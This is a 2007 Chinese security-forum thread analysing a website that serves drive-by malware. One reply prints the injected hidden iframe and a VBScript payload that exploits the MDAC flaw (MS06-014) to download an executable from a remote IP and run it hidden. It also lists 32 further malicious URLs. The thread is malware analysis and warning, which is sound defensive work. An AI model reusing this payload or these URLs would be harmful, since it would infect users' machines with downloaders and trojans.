收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 红伞区一个毒网,超过30个毒挂在上面
12下一页
返回列表 发新帖
查看: 6088|回复: 12
收起左侧

[病毒样本] 红伞区一个毒网,超过30个毒挂在上面

[复制链接]
绅博周幸
发表于 2007-1-18 12:40:06 | 显示全部楼层 |阅读模式
  1. www.1717kan.cn/index_1077.asp
复制代码




[:11:]

[ 本帖最后由 navigateqd 于 2007-1-18 16:26 编辑 ]
回复

举报

bloodsnow
发表于 2007-1-18 13:24:50 | 显示全部楼层
呵呵
上去看了没等发现30个我就关了那个网页
呵呵
回复

举报

bg8ace
发表于 2007-1-18 13:28:21 | 显示全部楼层
我今天豁出去了!!!!
我用macfee2007个人套装试一试!!!!!
如果我很久没回复的话!我就挂了重装系统去了!
如果拦截下来了我就。。。。。
回复

举报

绅博周幸
 楼主| 发表于 2007-1-18 13:29:32 | 显示全部楼层
为3楼兄弟默哀吧,我们会想念你的,感谢你为卡饭做的贡献
回复

举报

bg8ace
发表于 2007-1-18 13:36:39 | 显示全部楼层

拦截下了!!!!
还好还好!!!万幸万幸!!
用绿色卡巴,蜘蛛查了下没留下后遗症!!!
回复

举报

archeyy 该用户已被删除
发表于 2007-1-18 15:42:50 | 显示全部楼层
不敢上去哦,可以把病毒样本发上来看看吗?
回复

举报

dikex
发表于 2007-1-18 16:53:08 | 显示全部楼层
  1. <script language="javascript" src="http://count23.51yes.com/click.aspx?id=233356760&logo=1"></script>
  2. <iframe src='http://59.34.197.239/in.asp?newwebname=1077' width='0' height='0' frameborder='0'></iframe>
  3. <script language="javascript" src="http://59.34.197.239/in.js"></script>
  4. <DIV style="DISPLAY: none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/579660.js"></script></DIV>
  5. <script language="javascript" type="text/javascript" src="http://js.users.51.la/552570.js"></script>
复制代码


这个http://www.1717kan.cn/index_1077.asp里面的内容,一共镶嵌了四个网页,其中有问题的是http://59.34.197.239/in.js这个js文件:

  1. document.write('<script language="VBScript">');
  2.     document.write(':on error resume next');
  3. document.write(':dl="http://203.171.236.215/downloader.exe"');
  4. document.write(':fname1="downloader.exe"');
  5. document.write (':sub shellexe(fname1)')
  6. document.write(':set Q = df.createobject("Shell.Application","")');
  7. document.write(':Q.ShellExecute fname1,"","","open",0');
  8. document.write (':end sub')
  9. document.write(':  Set df = document.createElement("object")');
  10. document.write(' :  df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"');
  11.   document.write(':     set SS = df.createobject("Adodb.Stream","")');
  12. document.write('  : SS.type = 1');
  13. document.write(':set F = df.createobject("Scripting.FileSystemObject","")');
  14. document.write('  :  set tmp = F.GetSpecialFolder(2)');
  15. document.write(' : fname1= F.BuildPath(tmp,fname1)');

  17. document.write(' :  SS.open');
  18.      document.write('  :    Set getexe = df.CreateObject("Microsoft."&"XMLHTTP","")');
  19. document.write(':getexe.Open "GET", dl, False');
  20. document.write(' :  getexe.Send');
  21. document.write('  : SS.write getexe.responseBody');
  22.   document.write(' : SS.savetofile fname1,2');
  23. document.write(' :   SS.close');
  24. document.write(' :  call shellexe(fname1)');
  25.   document.write('  </script>');
复制代码


首先利用MDAC功能中的漏洞可能允许执行代码 (911562)这个经典漏洞下载http://203.171.236.215/downloader.exe这个文件,卡巴没有报,但从名字看来是一个下载者

接着就是这个js文件里面的核心部分了,一共镶嵌了32个网页!估计都是挂马网页或者镶嵌其他挂马网页或者两种都有,太多了没有那么多精力去一个一个分析了

  1. http://go.ipcenter.cn/81308.asp
  2. http://go.ipcenter.cn/maya777.asp
  3. http://ip.8dunet.com/esdys.asp
  4. http://ma.new9991.com/360/1022.htm
  5. http://julong.ip8868.cn/hkjulong.asp
  6. http://www3.winopen.cn/800uc.asp
  7. http://go.ipcenter.cn/6262561.asp
  8. http://go.bannerbox.cn/602532116.asp
  9. http://www1.sowz.com.cn/server.asp
  10. http://www1.sowz.com.cn/ad.asp
  11. http://go.ipcenter.cn/zt920.asp
  12. http://ip.ipunion.cn/i114.asp
  13. http://www1.sowz.com.cn/news.asp
  14. http://www1.sowz.com.cn/solution.asp
  15. http://www1.sowz.com.cn/case.asp
  16. http://www1.sowz.com.cn/storage.asp
  17. http://www1.sowz.com.cn/sheshi.asp
  18. http://www.f1ash8.net/pepsi.asp
  19. http://go.ipcenter.cn/26secom.asp
  20. http://go.ipcenter.cn/fzzvv.asp
  21. http://go.ipcenter.cn/15641651.asp
  22. http://59.34.197.239/0013exe.htm
  23. http://www1.winopen.cn/fpjyw1.asp
  24. http://go.bannerbox.cn/zewq8861.asp
  25. http://go.ipcenter.cn/chqyswin.asp
  26. http://www1.winopen.cn/41ip111.asp
  27. http://go.bannerbox.cn/dasuanbai.asp
  28. http://go1.ipcenter.cn/id511.asp
  29. http://ip.adanywhere.cn/open1.asp
  30. http://www1.winopen.cn/community.asp
  31. http://tugood.ip8868.cn/tugood.asp
  32. http://www1.sowz.com.cn/index.asp
复制代码


用虚拟机+嗅探器的方式把他们下载的毒都找出来吧

这东西还真是老实不客气啊!首先下载了好几个流氓和木马,弹出一些奇怪的网页,然后这些东西就继续下载其他的流氓和病毒,造成连锁反应!还弹出N个对话框,害我的虚拟机徘徊在死机的边缘

排除卡巴已经报的,并筛选了一些,还有大约3.6MB的样本(其中有流氓、病毒和网马……),看了上传的话要联系版主了,但样本区貌似还没有版主啊

[ 本帖最后由 dikex 于 2007-1-18 21:38 编辑 ]

评分

参与人数 1经验 +5 收起 理由
navigateqd + 5 版区有你更精彩: )

查看全部评分

回复

举报

jyh183185
发表于 2007-1-18 19:49:25 | 显示全部楼层
怕怕,不敢上去玩了.
回复

举报

wweir
发表于 2007-1-18 20:52:55 | 显示全部楼层
有30个病毒?奇怪了,我开着咖啡,怎么上去反映都没有,什么都没跳出来,和正常网页好像没有区别哦!
回复

举报

dikex
发表于 2007-1-18 21:42:05 | 显示全部楼层
原帖由 wweir 于 2007-1-18 20:52 发表
有30个病毒?奇怪了,我开着咖啡,怎么上去反映都没有,什么都没跳出来,和正常网页好像没有区别哦!



这个是利用MDAC功能中的漏洞可能允许执行代码 (911562)这个经典漏洞下载的,所以打好补丁后是不会有什么问题的。
事实再一次告诉我们:一定要打好补丁!
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-1 00:40 , Processed in 0.130939 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表